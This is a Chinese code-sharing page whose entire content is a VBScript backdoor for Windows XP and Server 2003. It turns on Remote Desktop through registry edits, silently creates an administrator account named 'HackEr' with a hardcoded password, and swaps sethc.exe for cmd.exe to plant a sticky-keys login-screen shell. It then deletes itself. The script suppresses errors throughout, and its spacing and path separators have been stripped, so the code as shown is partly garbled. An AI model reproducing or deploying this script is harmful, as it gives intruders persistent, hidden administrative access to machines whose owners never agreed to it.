复制代码 代码如下:
onerrorresumenext
constHKEY_LOCAL_MACHINE=&H80000002
strComputer="."
SetStdOut=WScript.StdOut
SetoReg=GetObject("winmgmts:{impersonationLevel=impersonate}!"&_
strComputer&"rootdefault:StdRegProv")
strKeyPath="SYSTEMCurrentControlSetControlTerminalServer"
oReg.CreateKeyHKEY_LOCAL_MACHINE,strKeyPath
strKeyPath="SYSTEMCurrentControlSetControlTerminalServerWdsrdpwdTdstcp"
oReg.CreateKeyHKEY_LOCAL_MACHINE,strKeyPath
strKeyPath="SYSTEMCurrentControlSetControlTerminalServerWinStationsRDP-Tcp"
strKeyPath="SYSTEMCurrentControlSetControlTerminalServer"
strValueName="fDenyTSConnections"
dwValue=0
oReg.SetDWORDValueHKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath="SYSTEMCurrentControlSetControlTerminalServerWdsrdpwdTdstcp"
strValueName="PortNumber"
dwValue=3389
oReg.SetDWORDValueHKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath="SYSTEMCurrentControlSetControlTerminalServerWinStationsRDP-Tcp"
strValueName="PortNumber"
dwValue=3389
oReg.SetDWORDValueHKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
onerrorresumenext
dimusername,password:IfWscript.Arguments.CountThen:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="HackEr":password="393214425":endif:setwsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"&wsnetwork.ComputerName:Setob=GetObject(os):Setoe=GetObject(os&"/Administrators,group"):Setod=ob.Create("user",username):od.SetPasswordpassword:od.SetInfo:Setof=GetObject(os&"/"&username&",user"):oe.Add(of.ADsPath)'wscript.echoof.ADsPath
OnErrorResumeNext
Dimobj,success
Setobj=CreateObject("WScript.Shell")
success=obj.run("cmd/ctakeown/f%SystemRoot%system32sethc.exe&echoy|cacls%SystemRoot%system32sethc.exe/G%USERNAME%:F©%SystemRoot%system32cmd.exe%SystemRoot%system32acmd.exe©%SystemRoot%system32sethc.exe%SystemRoot%system32asethc.exe&del%SystemRoot%system32sethc.exe&ren%SystemRoot%system32acmd.exesethc.exe",0,True)
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)
【xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本vbs】相关文章: